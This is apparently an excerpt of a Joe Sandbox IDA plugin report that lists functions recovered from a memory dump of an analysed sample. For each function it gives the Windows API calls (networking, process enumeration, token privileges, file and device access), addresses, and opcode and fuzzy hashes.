Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA19FA
GetSysColor.USER32(0000000F), ref: 00AA1A4E
SetBkColor.GDI32(?,00000000), ref: 00AA1A61

Part of subcall function 00AA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: a792bb278b4250862165df32d83ea6fffa831599e96731b5c4f34077cc841c61
Instruction ID: 45758e8227883697296a3ee2fde2973d1fa2c6fe26fb5a37e38b49cc424400d3
Opcode Fuzzy Hash: a792bb278b4250862165df32d83ea6fffa831599e96731b5c4f34077cc841c61
Instruction Fuzzy Hash: 6DA10371126554BEE728AB299C48EBF3AADEB47381F15011BF403D72D2CF248D01D2B6

Function 00B16A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B16AB1
WSAGetLastError.WSOCK32(00000000), ref: 00B16ADA
bind.WSOCK32(00000000,?,00000010), ref: 00B16B13
WSAGetLastError.WSOCK32(00000000), ref: 00B16B20
closesocket.WSOCK32(00000000,00000000), ref: 00B16B34

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 0f3b31989b7ac85adbb12802642d74734e766cbd7109d62db605582b2a43de4e
Instruction ID: 02d377882c4f0a97df46416ba9394cb9ae6453bed0e98fef4e395235d4d2337f
Opcode Fuzzy Hash: 0f3b31989b7ac85adbb12802642d74734e766cbd7109d62db605582b2a43de4e
Instruction Fuzzy Hash: 3541B175B00214AFEB20AF649D86F7FB7E8DB09710F448059F91AAB2D2DB749D018791

Function 00B255FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B2564C
IsWindowEnabled.USER32 ref: 00B2565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00B25667
IsIconic.USER32 ref: 00B25675
IsZoomed.USER32 ref: 00B25683

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0d17347656c6bbbad0d76f52a8ca4e1bd912aaae29849ac33d6abc72324d7be0
Instruction ID: da35c9a34410c9fa654d72dc5c781bb094a2e2c3fce0e80e05db89cf486fa250
Opcode Fuzzy Hash: 0d17347656c6bbbad0d76f52a8ca4e1bd912aaae29849ac33d6abc72324d7be0
Instruction Fuzzy Hash: C411B2317009216FE7321F26EC44B2B77E9EF55761B444479F80AD7251CB30D902CAA5

Function 00B1C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AE1D88,?), ref: 00B1C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C324

Strings

kernel32.dll, xrefs: 00B1C30D
GetSystemWow64DirectoryW, xrefs: 00B1C31E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 537d643494a1bdbc9b388290f9e6ae0860232dab3a772a1590115ad808fc6804
Instruction ID: f021eb5573494bf29431881898fc22b07055ba954250da164f18f8e897bda3c3
Opcode Fuzzy Hash: 537d643494a1bdbc9b388290f9e6ae0860232dab3a772a1590115ad808fc6804
Instruction Fuzzy Hash: A4E0EC74650713CFDB304F25E808B967AE4EF08756BC084B9E8A6D3260EB70D891CA60

Function 00AB3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: c9ef3f64e70e03df854d1c2fe3d7e08a43d272d003d10f7f6b42ad16a2aa26b0
Instruction ID: 9cdd9a3413406a64637f77c1c6e6f6677c5a95be8780c15a8a734242f6cb4ac4
Opcode Fuzzy Hash: c9ef3f64e70e03df854d1c2fe3d7e08a43d272d003d10f7f6b42ad16a2aa26b0
Instruction Fuzzy Hash: B3229D726083419FCB24DF24C991BAFB7E8BF85300F14491DF5969B292DB71EA04CB92

Function 00B1F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B1F151
Process32FirstW.KERNEL32(00000000,?), ref: 00B1F15F

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Process32NextW.KERNEL32(00000000,?), ref: 00B1F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1F22E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 1e444ec3964ed2b1d8ea2170475fdbc59f94b0f131fa0b99c4a1e19b0ace7e95
Instruction ID: 5d24b7fd1df66b7835cb674393f1df605ee1331763ad8d29bf36bf56852ebc3f
Opcode Fuzzy Hash: 1e444ec3964ed2b1d8ea2170475fdbc59f94b0f131fa0b99c4a1e19b0ace7e95
Instruction Fuzzy Hash: 8C516D71504301AFD320EF20DC85EABBBE8FF99750F50492DF495972A1EB70A909CB92

Function 00B040B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B040D1
_memset.LIBCMT ref: 00B040F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B04144
CloseHandle.KERNEL32(00000000), ref: 00B0414D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 622e113f0fb826d7e3984ff0895304549e4d94ffc83b810b36b5c578cddd82ac
Instruction ID: b5e1a62f472a07038cfb3c09faf4cd3d6b9eeecf416beaaa0545f4e63426cfd9
Opcode Fuzzy Hash: 622e113f0fb826d7e3984ff0895304549e4d94ffc83b810b36b5c578cddd82ac
Instruction Fuzzy Hash: F411AB759012287AD7309BA59C4DFABBBBCEF45760F1041EAF908E7180D6744E808BA4

Function 00AFEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AFEB19

Strings

|, xrefs: 00AFEB49
(, xrefs: 00AFEB5F

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: a4b33c8bf6ce59c69f3b70c18bff787f0c22c31ad1e9768049c7ab272d984c78
Instruction ID: 259aee191c8abf57185311fb71611e9cb136590996be1f03cf5862496cf91c03
Opcode Fuzzy Hash: a4b33c8bf6ce59c69f3b70c18bff787f0c22c31ad1e9768049c7ab272d984c78
Instruction Fuzzy Hash: 99322575A00605DFD728CF69C481A6AB7F1FF48310B15C56EE99ADB3A1EB70E981CB40

Function 00B125E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00B126D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B1270C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: ef150fd11959fb512fb58ff79f39ee2406dacf7d695e7960dabc4f804648896d
Instruction ID: 97e8f517293aa70d8f21e1990fcea588990141aa41b3417904b9bb6e54129f8f
Opcode Fuzzy Hash: ef150fd11959fb512fb58ff79f39ee2406dacf7d695e7960dabc4f804648896d
Instruction Fuzzy Hash: 8941C375A00209BFEB24DB94DDC5EFBB7FCEB40714F5040AEFA01A6180EA719ED19654

Function 00B0B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B0B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B0B655

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 16077d5f009897b10f4ed82085c957e8385526a56add76c52b04cf8f47f5a48d
Instruction ID: 07f4b7e2eb137d6f1496b551108cacef3c0b0dc52c58b139c63474b54a79a195
Opcode Fuzzy Hash: 16077d5f009897b10f4ed82085c957e8385526a56add76c52b04cf8f47f5a48d
Instruction Fuzzy Hash: 38215135A00518EFCB00EF65D985EAEBBB8FF49310F1480A9E905AB3A1DB319916CB51

Function 00AF8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
GetLastError.KERNEL32 ref: 00AF8D47

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 5a9e6eb098c4de0e9aac694ce4b929209488a5c227efbce64d31e9cc2cac73f8
Instruction ID: 74339bf2ff839fad55567ceda469da8310ac34a4f922aebbd87ef40c5f62f1ed
Opcode Fuzzy Hash: 5a9e6eb098c4de0e9aac694ce4b929209488a5c227efbce64d31e9cc2cac73f8
Instruction Fuzzy Hash: 09116AB1914209AFE728AFA4DD85D7BB7BCEB44710B20852EF85693241EF30A8418A64

Function 00B04C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B04C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B04C43
FreeSid.ADVAPI32(?), ref: 00B04C53

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction ID: 985c58f4877b566b6cffa6edac3e0a324c4b10be587fe4a998188c071e3ea1f0
Opcode Fuzzy Hash: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction Fuzzy Hash: 77F03775A11309BBDB14DFE09D89ABEBBB8EB08201F0044A9AA01E2181E6706A448B50

Function 00AAE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268e95f0d1ce8385fe272e031da6066fdfa0f37c4d21ab31d764d72346df35e8
Instruction ID: 6daaf346bb1d0b502e3db12a0bc893560c73b7e025cbc4e0748c3755566b7302
Opcode Fuzzy Hash: 268e95f0d1ce8385fe272e031da6066fdfa0f37c4d21ab31d764d72346df35e8
Instruction Fuzzy Hash: 9122A975A00216CFDF24DF58C594AAEBBF4FF0A300F148569E856AB381E731AD85CB91

Function 00B0C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C966
FindClose.KERNEL32(00000000), ref: 00B0C996

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7c65cbc0a8985c1b846921d70449a8da4d29799d8e4f182e11ebba08984e9fb1
Instruction ID: b042fa6e84aec6d99dd1d5020e363a41ddea343b8d10a55992be91fd251b0576
Opcode Fuzzy Hash: 7c65cbc0a8985c1b846921d70449a8da4d29799d8e4f182e11ebba08984e9fb1
Instruction Fuzzy Hash: F51161726106049FD710EF29D945A2BFBE9FF85324F00865EF9A9D72A1DB30AC01CB81

Function 00B0A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B1977D,?,00B2FB84,?), ref: 00B0A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B1977D,?,00B2FB84,?), ref: 00B0A314

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 96a638b190e3d672486b19e4210f3a3f341761f7d7932eb3e5182bb3f9811cdb
Instruction ID: 5291f2548f756b6d528c9d30f02398ed1d4cb36e6566d8c9cca9b6ba9d63db66
Opcode Fuzzy Hash: 96a638b190e3d672486b19e4210f3a3f341761f7d7932eb3e5182bb3f9811cdb
Instruction Fuzzy Hash: B3F0823554532DBBDB209FA4CC48FEA776DFF09761F0085A6B909D7181DA30D940CBA1

Function 00AF8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8851), ref: 00AF8728
CloseHandle.KERNEL32(?,?,00AF8851), ref: 00AF873A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5a5366afc464266cf8c5d3da91d39f7b16de6eb8ee6497cb53f7b63144363635
Instruction ID: 968b8853ff35d1fdc97e60a927adfa5b71d39763df60f0226b2fc3fc8fc846ac
Opcode Fuzzy Hash: 5a5366afc464266cf8c5d3da91d39f7b16de6eb8ee6497cb53f7b63144363635
Instruction Fuzzy Hash: DDE0EC76010611EFE7352B60ED09E777BF9EF04750725883DF99681471DB62AC91DB10

Function 00ACA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8F97,?,?,?,00000001), ref: 00ACA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA3A3

Memory Dump Source

